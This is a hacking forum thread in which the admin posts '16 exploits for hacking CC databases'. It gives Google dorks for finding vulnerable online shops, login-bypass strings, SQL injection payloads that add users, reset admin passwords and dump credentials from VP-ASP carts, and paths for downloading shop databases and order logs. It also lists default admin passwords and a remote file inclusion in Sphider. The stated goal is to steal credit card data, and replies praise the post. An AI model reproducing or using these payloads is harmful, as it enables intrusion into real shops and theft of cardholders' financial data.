Malaysian WackWall Forum

Now Malaysian Can Connect Over The World
 
HomePortalCalendarGalleryFAQSearchMemberlistUsergroupsRegisterLog in
Navigation
:: Portal ::
:: Forum ::
 :: Memberlist ::
:: Profile ::
:: FAQ ::
:: Search ::


AlertPay Easy Money Transfer 100% Free to register
 
Log in
Username:
Password:
Log in automatically: 
:: I forgot my password
Google Translator
Latest topics
» IRC Flooder Script For Sale
Mon Oct 08, 2012 12:39 am by maxi.y.mateo

» utusan.com.my Being DDOS
Fri Jan 20, 2012 5:33 pm by Penjejak Badai

» PHP IRC Bot
Fri Dec 02, 2011 11:31 am by siperda

» SQL Injection Scanner By XShimeX
Mon Oct 24, 2011 6:22 pm by sucide_bomber

» Website Vulnerable Scanner Tools V1.01 By proqrammer
Mon Oct 24, 2011 6:21 pm by sucide_bomber

» Slowloris or XerXes Leak Version
Tue Sep 13, 2011 7:45 pm by sucide_bomber

» maisarah wuz here
Tue Sep 13, 2011 7:32 pm by sucide_bomber

» Sql Injection Tutorial
Tue Jul 19, 2011 2:56 pm by sucide_bomber

» XerXes Source Codes!!
Wed Jul 13, 2011 8:55 am by wackwall

» SQL Injection dalam bahasa Malaysia
Thu Jun 30, 2011 9:11 pm by sucide_bomber

» LFI Scanner ( Perl )
Mon Jun 27, 2011 8:21 am by wackwall

» Muhasabah diri tingkat kesyukuran, keinsafan umat
Mon Jun 27, 2011 3:56 am by sucide_bomber

» 5013 Webs With SQL Vuln
Mon Jun 27, 2011 3:50 am by sucide_bomber

» Saya mencari part time job online?
Mon Jun 27, 2011 1:19 am by sucide_bomber

» 16 exploits for hacking CC databases
Mon Jun 13, 2011 1:33 pm by sucide_bomber

Link Exchange
Online News


















Churp2x Campaign
Click Pada Iklan DiBawah & Dapatkan Ganjaran Anda
SEKARANG!



















Mangga Ads
NuffNang Ads

Share | 
 

 16 exploits for hacking CC databases

View previous topic View next topic Go down 
AuthorMessage
wackwall
Admin


Zodiac : Cancer Chinese zodiac : Rooster
Posts : 159
Points : 2620
Reputation : 2
Join date : 10/12/2010
Age : 35
Location Location : Sarawak

PostSubject: 16 exploits for hacking CC databases   Mon Apr 25, 2011 10:58 am

Most of these are outdated but they can still work if you happen to find a vulnerable site:

1:

google dork :--> inurl:"/cart.php?m="
target looks lile :--> [You must be registered and logged in to see this link.]
exploit: chage cart.php?m=view to /admin
target whit exploit :--> [You must be registered and logged in to see this link.]
Usename : 'or"="
Password : 'or"="

2-

google dork :--> allinurlroddetail.asp?prod=
target looks like :--> [You must be registered and logged in to see this link.] (big leters and numbers )
exploit :--> chage the proddtail.asp?prod=SG369 whit fpdb/vsproducts.mdb
target whit exploit :--> [You must be registered and logged in to see this link.]

3-

google dork :--> allinurl: /cgi-local/shopper.cgi
target looks like :--> [You must be registered and logged in to see this link.]
exploit :--> ...&template=order.log
target whit exploit :--> [You must be registered and logged in to see this link.]

4-

google dork :--> allinurl: Lobby.asp
target looks like :--> [You must be registered and logged in to see this link.]
exploit :--> change /mall/lobby.asp to /fpdb/shop.mdb
target whit exploit :--> [You must be registered and logged in to see this link.]

5-

google dork :--> allinurl:/vpasp/shopsearch.asp
when u find a target put this in search box
Keyword=&category=5); insert into tbluser (fldusername) values
('')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword='' where
fldusername='admin'--&SubCategory=All&action.x=33&action.y=6

login page: [You must be registered and logged in to see this link.]

6-

google dork :--> allinurl:/vpasp/shopdisplayproducts.asp
target looks like :--> [You must be registered and logged in to see this link.]
exploit :--> [You must be registered and logged in to see this link.] ct%20fldauto,fldpassword%20from%20tbluser%20where% 20fldusername='admin'%20and%20fldpassword%20like%2 0'a%25'-
if this is not working try this ends
%20'a%25'--
%20'b%25'--
%20'c%25'--
after finding user and pass go to login page:
[You must be registered and logged in to see this link.]

7-

google dork :--> allinurl:/shopadmin.asp
target looks like :--> [You must be registered and logged in to see this link.]
exploit:
user : 'or'1
pass : 'or'1

8-

google.com :--> allinurl:/store/index.cgi/page=
target looks like :--> [You must be registered and logged in to see this link.]
exploit :--> ../admin/files/order.log
target whit exploit :--> [You must be registered and logged in to see this link.]

9-

google.com:--> allinurl:/metacart/
target looks like :--> [You must be registered and logged in to see this link.]
exploit :--> /database/metacart.mdb
target whit exploit :--> [You must be registered and logged in to see this link.]

10-

google.com:--> allinurl:/DCShop/
target looks like :--> [You must be registered and logged in to see this link.]
exploit :--> /DCShop/orders/orders.txt or /DCShop/Orders/orders.txt
target whit exploit :--> [You must be registered and logged in to see this link.] or [You must be registered and logged in to see this link.]

11-

google.com:--> allinurl:/shop/category.asp/catid=
target looks like :--> [You must be registered and logged in to see this link.]
exploit :--> /admin/dbsetup.asp
target whit exploit :--> [You must be registered and logged in to see this link.]
after geting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
target for dl the data base :--> [You must be registered and logged in to see this link.] (dosent need to be like this)
in db look for access to find pass and user of shop admins.

12-

google.com:--> allinurl:/commercesql/
target looks like :--> [You must be registered and logged in to see this link.]
exploit :--> cgi-bin/commercesql/index.cgi?page=
target whit exploit admin config :--> [You must be registered and logged in to see this link.]
target whit exploit admin manager :--> [You must be registered and logged in to see this link.]
target whit exploit order.log :--> [You must be registered and logged in to see this link.]

13-

google.com:--> allinurl:/eshop/
target looks like :--> [You must be registered and logged in to see this link.]
exploit :-->/cg-bin/eshop/database/order.mdb
target whit exploit :--> [You must be registered and logged in to see this link.]
after dl the db look at access for user and password

14-

1/search google: allinurl:"shopdisplayproducts.asp?id=
--->[You must be registered and logged in to see this link.]

2/find error by adding '
--->[You must be registered and logged in to see this link.]

--->error: Microsoft JET database engine error "80040e14"...../shop$db.asp, line467

-If you don't see error then change id to cat

--->[You must be registered and logged in to see this link.]

3/if this shop has error then add this: %20union%20select%201%20from%20tbluser"having%201= 1--sp_password

--->[You must be registered and logged in to see this link.] 1%20from%20tbluser"having%201=1--sp_password

--->error: 5' union select 1 from tbluser "having
1=1--sp_password.... The number of column in the two selected tables or
queries of a union queries do not match......

4/ add 2,3,4,5,6.......until you see a nice table

add 2
---->[You must be registered and logged in to see this link.] 1,2%20from%20tbluser"having%201=1--sp_password
then 3
---->[You must be registered and logged in to see this link.] 1,2,3%20from%20tbluser"having%201=1--sp_password
then 4 ---->[You must be registered and logged in to see this link.] 1,2,3,4%20from%20tbluser"having%201=1--sp_password

...5,6,7,8,9.... untill you see a table. (exp:...47)

---->[You must be registered and logged in to see this link.]
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3
7,38,39,40,41,42,,43,44,45,46,47%20from%20tbluser"
having%201=1--sp_password
---->see a table.


5/When you see a table, change 4 to fldusername and 22 to fldpassword you will have the admin username and password

--->[You must be registered and logged in to see this link.]
201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16
,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,3
0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,
47%20from%20tbluser%22having%201=1--sp_password

6/Find link admin to login:
try this first: [You must be registered and logged in to see this link.]
or: [You must be registered and logged in to see this link.]


Didn't work? then u have to find yourself:

add: (for the above example)
'%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10
,11,12,13,14,15,16,17,18,19,20,21,22,
23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39
,40,41,42,43,44,45,46,47%20from%20configuration"ha
ving%201=1--sp_password

--->[You must be registered and logged in to see this link.]
,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,
23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39
,40,41,42,43,44,45,46,47%20from%20configuration"ha
ving%201=1--sp_password


you'll see something like: ( lot of them)

shopaddmoretocart.asp
shopcheckout.asp
shopdisplaycategories.asp
..............

then guess admin link by adding the above data untill you find admin links

15-

Type: VP-ASP Shopping Cart
Version: 5.00
Dork = intitle:VP-ASP Shopping Cart 5.00
You will find many websites with VP-ASP 5.00 cart software installed
Now let's get to the exploit..

the page will be like this ****://***.victim.com/shop/shopdisplaycategories.asp
The exploit is : diag_dbtest.asp
so do this:
****://***.victim.com/shop/diag_dbtest.asp

A page will appear with something like:

xDatabase
shopping140

xDblocation
resx

xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.:. EXAMPLE .:.
the most important thing here is xDatabase
xDatabase: shopping140
ok now the URL will be like this:
****://***.victim.com/shop/shopping140.mdb
if you didn't download the Database..
Try this while there is dblocation.
xDblocation
resx

the url will be:
****://***.victim.com/shop/resx/shopping140.mdb
If u see the error message you have to try this :
****://***.victim.com/shop/shopping500.mdb

download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com

inside you should be able to find credit card information.
and you should even be able to find the admin username and password for the website.

the admin login page is usually located here
****://***.victim.com/shop/shopadmin.asp

if you cannot find the admin username and password in the mdb file or
you can but it is incorrect, or you cannot find the mdb file at all then
try to find the admin login page and enter the default passwords which
are

Username: admin
password: admin
OR
Username: vpasp
password: vpasp


16-

Sphider Version 1.2.x (include_dir) remote file inclusion

# Sphider Version 1.2.x (include_dir) remote file inclusion
# script Vendor: [You must be registered and logged in to see this link.]
# Discovered by: IbnuSina
found on index.php
$include_dir = "./include"; <--- no patch here
$language_dir = "./languages";
include "$include_dir/index_header.inc";
include "$include_dir/conf.php";
include "$include_dir/connect.php";

exploitz : [You must be registered and logged in to see this link.]


Thanks,

wackwall
Back to top Go down
View user profile http://malaysia.1talk.net
Perasaan



Posts : 4
Points : 2107
Reputation : 0
Join date : 03/03/2011
Location Location : 50uth 0f h34v3n

PostSubject: Re: 16 exploits for hacking CC databases   Mon Apr 25, 2011 12:13 pm

gud jub brus... ;D
Back to top Go down
View user profile
sucide_bomber
New User
New User


Posts : 23
Points : 2052
Reputation : 0
Join date : 20/05/2011
Location Location : l4nd 0f h34d hunt3r

PostSubject: Re: 16 exploits for hacking CC databases   Mon Jun 13, 2011 1:33 pm

Thanks bro...nice share... cheers
Back to top Go down
View user profile
Sponsored content




PostSubject: Re: 16 exploits for hacking CC databases   Today at 11:54 am

Back to top Go down
 
16 exploits for hacking CC databases
View previous topic View next topic Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
Malaysian WackWall Forum :: Internet :: h4ck3d :: Exploits-
Jump to: